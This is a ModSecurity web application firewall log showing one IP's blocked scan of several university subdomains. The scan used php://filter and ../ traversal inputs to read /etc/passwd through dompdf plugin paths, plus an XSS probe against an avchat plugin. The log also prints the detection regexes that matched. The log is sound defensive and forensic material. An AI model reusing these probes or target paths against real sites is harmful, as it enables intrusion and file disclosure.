[Tue Aug 29 11:53:20.167116 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAnTlcIAAAAA"]
[Tue Aug 29 11:53:20.553213 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAnTlcMAAAAA"]
[Tue Aug 29 11:53:20.561585 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAojaqUAAAAb"]
[Tue Aug 29 11:53:20.653731 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAot8OsAAAAn"]
[Tue Aug 29 11:53:20.660651 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAosCwwAAAAm"]
[Tue Aug 29 11:53:20.692939 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAni-DcAAAAU"]
[Tue Aug 29 11:53:21.558100 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAn4044AAAAW"]
[Tue Aug 29 11:53:21.641594 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAosCxIAAAAm"]
[Tue Aug 29 11:53:21.655406 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAowNoMAAAAH"]
[Tue Aug 29 11:53:21.667340 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAoAkzQAAAAC"]
[Tue Aug 29 11:53:21.685650 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAot8PMAAAAn"]
[Tue Aug 29 11:53:22.536683 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAosCxQAAAAm"]
[Tue Aug 29 11:53:22.550115 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAfWOWsAAAAL"]
[Tue Aug 29 11:53:22.550675 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAor7rcAAAAk"]
[Tue Aug 29 11:53:22.551395 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15wsCo-f0AAAoz700AAAAS"]
[Tue Aug 29 11:53:22.987037 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAo0gNMAAAAZ"]
[Tue Aug 29 11:53:23.080608 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoyGygAAAAI"]
[Tue Aug 29 11:53:23.183748 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15w8Co-f0AAAoz704AAAAS"]
[Tue Aug 29 11:53:23.197052 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAfWOWwAAAAL"]
[Tue Aug 29 11:53:23.285827 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAot8PUAAAAn"]
[Tue Aug 29 11:53:23.314699 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAoyGykAAAAI"]
[Tue Aug 29 11:53:23.419293 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAor7rkAAAAk"]
[Tue Aug 29 11:53:23.549718 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAowNocAAAAH"]
[Tue Aug 29 11:53:23.552540 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoLfS0AAAAG"]
[Tue Aug 29 11:53:23.836844 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAn405YAAAAW"]
[Tue Aug 29 11:53:24.088044 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAox7GUAAAAN"]
[Tue Aug 29 11:53:24.088242 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15xMCo-f0AAAolKWMAAAAe"]
[Tue Aug 29 11:53:24.117428 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15xMCo-f0AAAog@E0AAAAY"]
